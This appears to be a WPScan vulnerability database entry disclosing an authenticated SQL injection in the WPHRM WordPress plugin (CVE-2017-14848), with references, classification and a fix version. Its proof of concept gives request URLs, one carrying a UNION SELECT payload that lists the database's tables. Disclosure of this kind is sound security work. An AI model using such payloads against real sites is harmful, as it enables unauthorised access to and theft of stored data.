WPHRM <= 1.0 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The vulnerability allows an employee users to inject SQL commands.
Proof of Concept
http://localhost/[PATH]/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]-23+union+select 1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),7,8--%20-

http://localhost/[PATH]/?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=[SQL]

Affects Plugin

fixed in version 1.1

References

CVE 2017-14848
EXPLOITDB 42924
URL https://codecanyon.net/item/wphrm-human-resource-management-system-for-wordpress/20555857

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter David Hayes
Submitter Website https://wpshout.com
Submitter Twitter davidbhayes
Views 183
Verified No
WPVDB ID 8929

Timeline

Publicly Published 2017-09-09 (3 months ago)
Added 2017-10-11 (2 months ago)
Last Updated 2017-10-11 (2 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.